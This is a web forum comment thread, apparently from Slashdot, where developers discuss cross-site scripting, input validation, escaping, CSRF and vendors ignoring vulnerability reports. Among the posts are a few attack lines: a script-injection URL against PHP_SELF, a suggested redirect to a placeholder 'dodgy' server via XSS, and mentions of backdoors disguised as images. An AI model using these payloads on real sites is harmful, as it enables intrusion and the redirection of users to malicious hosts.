And it *is* a fairly common requirement, because of the existence of technlogies like 'contenteditable' and 'designmode' that allows sites to embed WYSIWYG HTML editors into a web browser, and the lack of alternatives that produce non-HTML results.

But forget that for a second: even if all you want to do is accept a URL and create a link to it, you need to do non-trivial filtering. Basically, you can either require that the URL is in a known good scheme (i.e. it begins with a substring from a list of good ones like "http:", "https:", "ftp:", "gopher:", "magnet:", etc.) or you can try to filter out URLs that invoke javascript. Start with anything that looks like "javascript:". Make it case insenstive. Now account for the fact that you can encode a URL with HTML entities for some or any characters (e.g. javscript), and that some browsers are rather permissivie with what they accept, and will accept embedded whitespace or null characters inside the javascript URL scheme.

Basically, the javascript URL scheme was a mistake that never should have been made. It has made filtering javascript out of HTML source code a nightmare. It has turned otherwise safe tags (like A and IMG) and attributes (style) into something that you *must* strip or examine closely to determine if there is a security issue.

Re:JavaScript/browser design flaw

C/C++ are supposed to be used to implement the alternative (and the Operating system, compression library, mpeg decoders, etc).

As for javascript, this post explains very well why we have this mess today:
http://developers.slashdot.org/comments.pl?sid=196 382&cid=16090867

Re:JavaScript/browser design flaw

[CrankyWorm]

What a load, I don't believe it's been moded up.
It's like a parent spanking a table when a kid hits his head on a corner.
If you have small kids, get a round table.
If you can't code, don't use C/C++ or JavaScript, get QuickBasic or something...

Re:JavaScript/browser design flaw

No, it's nothing like that.

Re:JavaScript/browser design flaw

[oohshiny]

The way that browsers work is based on the assumption that the website won't willing screw itself.

Yes, and that's a bad assumption.

By not validation user input and just dumping that junk out as markup, the website is making a big mistake.

Indeed. But the web browser is making an even bigger mistake by not validating input from the web site and screwing the user. Why is it doing that? Because that's what the web standards say it should do.

A standard is bad if (1) real developers have a propensity of making mistakes when using that standard and (2) it forces implementors of the standard to create systems that are vulnerable. JavaScript does both, which means that it's broken in not one but two ways.

Re:JavaScript/browser design flaw

What a load, I don't believe it's been moded up.

Of course, you don't believe it: your attitude is typical of someone who is barely above the beginner level of programing. If you ever advance beyond that, you'll understand.

I do my duty and report them. . .

[Hero+Zzyzzx]

but it's probably pointless. Not enough developers care about their craft.

There's a prominent "popular science" website out there (no, it's not this one that I'm thinking of) that has ENORMOUS XSS vulnerabilities in its image gallery. They pass captions and img src in URL encoded query string parameters. Yuck.

I noticed this about a year ago and reported it to the development team, with a demonstration link that put in a (sorta not nice) image and caption. No response, and when I checked six months ago the vulnerability was still there. So much for being a nice guy.

Re:I do my duty and report them. . .

Same here; I used to work for a grocery company that allowed customers to upload photos to their image lab for processing. I discovered several XSS vulnerabilities in their interface and pointed them out; a year later, they're all still there. Not only does it leave all of their customer's private photos vulnerable, but someone could leverage the exploit to do all sorts of nasty things, especially since there are ActiveX controls you must install for the site to work...

Re:I do my duty and report them. . .

[julesh]

If you're think about the site whose domain name's MD5 hash is "c6af41da42ae8a500747c2c920106c98" (or "7574dff77b3e597ee2e337984c8a27ce" without no LF at the end of it), I reported it to them some time around 2003 or so. They just don't care.

Re:I do my duty and report them. . .

[Hero+Zzyzzx]

Bingo. That's it. 2003? Ridiculous. Though I haven't the interest in confirming this, I'm sure all the sister sites are probably vulnerable too.

Re:I do my duty and report them. . .

[aldheorte]

Nice use of a digest to verify a piece of information known by an unknown party on a public forum without revealing the actual information!

Re:I do my duty and report them. . .

[mrcaseyj]

The company may deserve what it gets for leaving an open vulnerability like this. But there are a lot of innocent users who may suffer from this. I'm fine with quickly releasing vulnerabilities to the public, but only after warning the company that you're going public. It won't take crackers long to figure out what site you're referring to. Please tell the company that you've made their vulnerability public.

If you don't see that the hole is closed quickly you could be on the receiving end of a lawsuit from any users that are damaged. Even if you win, you will probably loose plenty in lawyers fees and hassle.

Thanks for alerting them to it in the first place though. Even if they ignored you, the rest of us out there appreciate your efforts.

Too Lazy?

It looks like the attacks can be prevented by simple user input validation. Are the above mentioned high profile website developers/architects being too lazy or nobody knew about this type of vulnerability until recently ? I cant see how Joe Average will know about this exploit because he will not bother to read the query string(or even understand what it does) if it points to major website.

Experienced this firsthand.

I've seen the interesting effects of this first hand with a customers server, which I was tasked to unhack. Took a while to spot the reason the server was hacked because stupidly I didn't think of XSS when I considered the range of hacks that had occurred. When I did finally start grepping the access_logs and saw the rather odd things being passed through an enquiry form script things started to piece together. I've filched a copy of the script passed and its quite impressive, though its probably reasonble to stake a claim on the hacker not being the script writer given the sheer wealth of comments and how to customize tips present. n00bishly (but then I'm not employed to harden boxes, nor am I a website programmer) I didn't expect a site to be quite so vulnerable to such a range of exploitation through XSS. The script I have includes stuff to exploit unpatched mysql to create new users, passes a load of hex strings I won't even hazard a guess at their purpose etc. etc.
As a geek I appreciate it the technical qualities, as the guy who had to unhack an exploited server however.. :)

Been there, done that.

[Medievalist]

For anything non-trivial, it would probably be quicker and cheaper to have the "pro" write the code in the first place than to pay him for his time to read, understand, and correct a steaming pile of turd spaghetti.

If you pay me enough money, I'll write new code and claim that what I did was correct the old codebase.

You could probably take a random blob of ones and zeros, run multiple instances of it as an executable image while randomly tweaking bits until you evolved a real executable, far faster than you could analyze some of the code I've had to replace over the years.

Firefox plugins:

[Burz]

A paper on cross-site tracking is available here, along with two preventative extensions called SafeHistory and SafeCache.

To help safeguard from scripting attacks, I also use NoScript extension.

The CookieSafe extension will block and help you manage cookies better than Firefox's built-in manager. ...other interesting privacy tools are...
Stealther (prevents recording of history and blocks ReferentHeader)
Tor anonymizer + Foxyproxy extension
ImgLikeOpera can switch image prefs with ease
Flashblock (stops flash animations from running until you click them)

and probably much more

Re:So hows that microcomputer revolution going?

Fuck off back to FFC.

But they don't care...

[BunnyClaws]

The problem from what I have seen is in the attitude of the people running the websites. Their attitude tends to be that cross-site scripting doesn't directly impact their servers but only impacts the systems viewing the website. Since this doesn't have a direct impact on their server's it's not a high visibility threat to them. Their attitude towards their visitors is "We are secure but it sucks to be you."

Aren't there any laws against these attacks?

[r_bertram42]

Where is the law in these cases?

I'm sure there are ways to know who the hacker is, so why don't they use the information to catch the criminals and put them on trial?

Re:Aren't there any laws against these attacks?

Yeah. And what about all those diseases? They have all those fancy microscopes and scanners and things. I'm sure there are ways to figure out what the cause is, so why don't they use the information to kill those germs and cure everybody?

Re:Aren't there any laws against these attacks?

[r_bertram42]

Point taken :)

You get what you pay for with developers...

[queenb**ch]

The biggest problem is farming everything in the world out to $8/hr guys in some foreign country. If you pay $8/hr, you're going to get an $8/hr guy. Keep in mind that Wal-Mart starts at $9/hr. Given these two statements, I fail to see why it's surprising that such simply fixed vulnerabilities continue to plague software.

2 cents,

QueenB

Re:You get what you pay for with developers...

[truthsearch]

I've seen more than a few domestic $200+/hr developers make basic security mistakes. The problem has nothing to do with the location of the developer or the amount they're paid. Of course if you find a truely great developer most likely you'll need to pay him/her well. But that certainly doesn't mean paying someone well guarantees you more secure code.

Re:You get what you pay for with developers...

[cubicledrone]

I've seen more than a few domestic $200+/hr developers make basic security mistakes.

Ok, so you started with "I have innate brilliance that allowed me to transcend a Computer Science curriculum," and now its "guys making $1600 a day can't find their ass with a search party."

Let me guess, you're the smartest guy on Earth, right?

Re:You get what you pay for with developers...

[isorox]

If you pay $8/hr, you're going to get an $8/hr guy. Keep in mind that Wal-Mart starts at $9/hr.

Of course, if the rent where your developer is is $200 a week, your $8/hr guy earning $320 a week doesn't have a lot left over.

An $8 an hour guy living in an area where rent is $20 a week will have the same left over that a $12.50/hour guy in the first place has. Chances are everything else is cheeper too. I work in London, pay £800 a month rent, £300 a month travel. That's a good portion of my paycheck gone before contemplating food and other luxuries.

If I worked from home and lived in Wales, I'd be able to take a £12k pay cut (40% goes in tax) for a better quality of life (more "off" time, less time wedged in someone's armpit)

Re:You get what you pay for with developers...

[alienmole]

People making $1600 a day do make mistakes like this, and the reason is because it's not necessarily part of their core mission, which is often just to get some system working in the first place. In that context, things like cross-site scripting errors are far down the road. If you're being paid by the hour or day, your time is usually spent on things the client has explicitly told you to spend it on, and budgeted for. Unless there's an identified chunk of the budget devoted to "audit and fix cross-site scripting holes", any time spent even thinking about that is a loss to the consultant. If the system ends up with such errors, and they weren't explicitly budgeted for, then consultants get paid to fix them, if the client decides to fix them. You don't have to be the smartest person on earth to make a lot of money as a consultant...

Re:You get what you pay for with developers...

[Xemu]

If you pay $8/hr, you're going to get an $8/hr guy

That's easy to fix, just pay $1600 per hour and you get a $1600/hr guy! My god, how good he must be.

Hint: Your logic has a flaw.

Re:You get what you pay for with developers...

Its true, there are hundreds of problems where I work, but for what i get paid its not worth the effort.

Anon for a reason :)

Re:You get what you pay for with developers...

[epee1221]

Actually, yours does. "If you pay little, you always get low quality," does not imply, "if you don't pay little, you get high quality." It implies, "if you don't get low quality, you didn't pay little."

Re:You get what you pay for with developers...

[queenb**ch]

No, but paying someone crappily will almost always ensure that you have crap for code.

2 more cents,

QueenB

Useful PHP Script

[plexium_nerd]

Which is why I always use SafeHTML whenever my applications ask for input.

Re:Useful PHP Script

Make sure to guard against Cross-Site Request Forgery (CSRF) as well.

FUD

[radu.stanca]

Don't assume you're immune to XSS vulnerabilities. They're everywhere

OMG!!! Won't somebody please think of the children?
Now guys, who cares `bout XSS when we have IE 0dayz around...

Re:FUD

[julesh]

who cares `bout XSS when we have IE 0dayz around...

People who only browse trusted sites and are suddenly having their IE installations exploited via those 0-days because somebody used an XSS attack to insert them into those sites.

Re:FUD

[utube]

You can't just "insert" this code into a part of a site that users would normally stumble across... you must be re-directed to the corrupted URL somehow in the first place - a link which is surely not going to come from that trusted source to begin with... unless it's an inside job?!

Re:FUD

[julesh]

Use XSS to insert a script that contains 'location.replace("http://my.dodgy.server.com/ownm e")' perhaps?

Validate, Validate AND Validate

[Joe+U]

I'm a web developer and I've said this dozens of times.

VALIDATE ALL INPUT EVERYWHERE.

Validate on the client. (For bandwidth reduction)
Validate at the APP Tier (For security)
Validate at the Data Tier(For security and integrity)

If you accept input from a web page, scrub it, and that doesn't mean stripping brackets or quotes, it means putting in a list of valid characters and tossing or replacing absolutely everything else.

Yes, you might wind up validating something that doesn't need to be validated or scrubbing something that doesn't need to be, the performance hit is worth it.

Also, Stored Procedures are a great resource, if you design them properly you add an extra layer of security that can actually improve your application performance. (All my recent projects have Stored Procedure execute only rights.

If your db code has select * from table in it, you're doing it wrong.

Ok, enough ranting from me.

Re:Validate, Validate AND Validate

it means putting in a list of valid characters and tossing or replacing absolutely everything else.

I'm sure that's great for your small websites. How exactly would this work for multilingual websites? You're going to manually enter all of UTF8? If you write your code properly, escaping and possibly doing basic checks such as size (or when you expect a number, that it is a number) will be enough. In the real world, most vulnerabilities are due to not checking at all.

Re:Validate, Validate AND Validate

[Joe+U]

Sorry, I should have been clearer. Escaping should have been in that list. Also I wasn't suggesting manually entering all of UTF8, ranges are fine, this is where regular expressions comes in handy.

Either way, "deny ALL, allow some" is always the most secure. After all, this is a form of a firewall.

Re:Validate, Validate AND Validate

[Ambush+Commander]

The trouble with this is when you start getting remotely complex dataforms passed to your application. Even plaintext has it's issues: did you know that the flagship PHP function for escaping text htmlentities() doesn't actually properly escape the text? It's blithely ignorant of encoding issues and will happily pass along control characters and malformed strings.

Combine that with HTML and you've got a formidable problem. Not one that can't be solved, take for example HTML Purifier, but it is extremely difficult to do well. Whitelists often butt heads with permissiveness.

Re:Validate, Validate AND Validate

[Sklivvz]

I'm a web developer also and use the very same best practices.
Bravo!

Come on

[donutello]

You can't just post something like this without a link to the post in question.

Please?

Re:Come on

[_xeno_]

By "a while ago" I actually mean "a couple of years." I think it was in 2001 or 2002, but I'm not positive.

I think it may have been before Slashdot started keeping comments moderated to -1 after the story became archived, so I may not actually be able to find the original post. Unfortunately I don't remember what the story was, and I haven't found it in a Google search. If I ever find it again, I'll be sure to post it.

XSS attempts I've noticed

[trevdak]

As a content manager for the U of Rochester when I was a student there, I witnessed thousands of attempts at XSS every month. All of this thanks to one idiot who decided he wanted to put a mambo website up on the student activities server, we had our main server breached and multiple websites defaced. once you're breached, everyone wants to try to hack you again. One interesting thing I noticed is that the majority of XSS attempts will try to call a script in a file with a .gif or .jpg name. This way, if a curious person sees the attempt and tries to visit the linked script, all they get is a broken image. However, the file_get_contents php function, or other such functions, will read those as PHP. I've seen these scripts uploaded to government websites, university servers and many other places. The one that was put on the U of Rochester server attempted to delete all of the files on the server and put in code for what looked like a perl proxy server (i dunno, it was kinda obfuscated, and I'm not too good at perl yet). The XSS scripts are quite complex, too. Some of them create HTML/javascript console interfaces for people to interact with the server as if they had an SSH connection. And they're all over the place. I've got a website that's had less than 1000 hits, and I've seen three separate attempts to use XSS on it.

Re:XSS attempts I've noticed

[kayditty]

Read those as PHP? I believe you're thinking of a different vulnerability entirely. That's called a remote inclusion vulnerability. I've done that by uploading a backdoor script disguised as an image file, but it's best to use Header("Location: ") instead of just having a malformed image.

Sing with me...

Sing with me...

Who stole the cookie from the browser's cache?
Zero Cool stole the cookie from the browser's cache.
Who me?
Yes you!
Couldn't be!...

I do my duty and blind them. . .

"I noticed this about a year ago and reported it to the development team, with a demonstration link that put in a (sorta not nice) image and caption. No response, and when I checked six months ago the vulnerability was still there. So much for being a nice guy."

Well if it was the goatse.cx guy? Then you blinded them. They're proably laid off collecting disability. While their replacements have been warned not to accept contact with you.

PayPal had it yesterday

PayPal had it yesterday. I went there and got a cert pop up. The cert was for ebayobject.com, not www.paypal.com. Needless to say, I ran, and I ran fast.

Never trust the user!

[gknoy]

.. or his browser!

Please mod the parent up.

If you're assuming everything is coming down correctly encoded you're a fool. This goes for logins ("admin=true" in the URL? BAD!), data, anything logic-related, etc. Scrub it all. Paranoia is the proper way of life for web developers.

Re:Never trust the user!

[julesh]

I think the point is, though, that you don't need to encode for typical AJAX usage patterns. You want to put content into a document? Grab it out of an XML document (browser decodes it from that encoding for you) and call "document.createTextNode(variableThatYouStoredItIn )" (browser doesn't interpret content as HTML).

The flaw that gives rise to XSS is the idea that pasting user-submitted content into a text serialisation of a web page is a good idea. You can fix it by using an API that doesn't do that, the same as you can fix SQL injection vulnerabilities by using prepared statements. It's the same idea. The issues are pretty much the same. The same solution works for both of them.

Re:Never trust the user!

[gknoy]

Interesting! I never knew that. Thanks for putting it so clearly. =)

XSS is Common Because Our Tools Are Broken

[Dom2]

How many "web" templating systems do you know that automatically escape HTML unless told otherwise? I know of one that can be made to do so: Mason. Even then, you have to enable it, as it's not turned on by default.

What about PHP, ASP, JSP and so on? Will they ever grow up and automatically escape HTML by default? I doubt it very much.

In the meantime, there's always mod_security if you're willing to invest the time configuring it. But it's no guarantee...

-Dom

Re:XSS is Common Because Our Tools Are Broken

I don't have a problem, I audit my code for XSS and filter anything intended for display in a browser. Some web frameworks pass all input through an XSS filter, I don't want that overhead. The truth is that browsers accept all kinds of shit for no good reason and I'm just not doing that level of filtering. I'd like to see browsers honour something like this:

<meta name="scripting" content="FORCE_DISABLE" />

This would disable all script on a per-page basis (including in IFRAMES and CSS!), it's very simple and kills XSS. CSRF is another problem and the only solution at this time is to have your users disable scripting.

Re:XSS is Common Because Our Tools Are Broken

[Dom2]

I don't have a problem, I audit my code for XSS and filter anything intended for display in a browser.

Good for you! Now what about the 99% of developers who don't?

<meta name="scripting" content="FORCE_DISABLE" />

Looks lovely. Now how are you going to get that installed into the existing browser base?

CSRF is another problem and the only solution at this time is to have your users disable scripting.

I was under the impression that you could tackle CSRF on the server side by doing enough validation to ensure that what you're getting back is what you sent out in the first place. e.g. by specifying a token that you generated as part of the form.

-Dom

Re:You get what you pay for with developers???

This would seem to imply that for OSS software where the user pays NOTHING and most developers get paid NOTHING, you get ONLY JUNK? Hardly. You often do get what you pay for when you consider relative pay, but not always.

Major vector: $PHP_SELF

[GrumpySimon]

I quite often see people using $PHP_SELF ( or better $_SERVER['PHP_SELF'] ) in their php applications (for example, for the form action on a self posting form). What most  of them don't realise is that it is user input, and very easy to inject any content into this.

I think this is a major XSS vector, because this is unknown (really now, wouldn't you expect a $_SERVER variable to be safe?)

For example:

<form action="<?php echo $_SERVER['PHP_SELF'];?>" method="get">
   <input type="text" name="field" />
   <input type="submit" />
</form>

Going to - page.php/"<script>alert('xss');</script> will work quite nicely (note the trailing slash after the page name).

There's a good discussion of it at <URL:http://blog.phpdoc.info/archives/13-guid.html >

They've been around

[utube]

They've been around much longer than this report suggests.

Any solution

[vz3phyre]

Hi guys! I am still learning to build a trusted websites for my own used... any recommended sites for me to refer?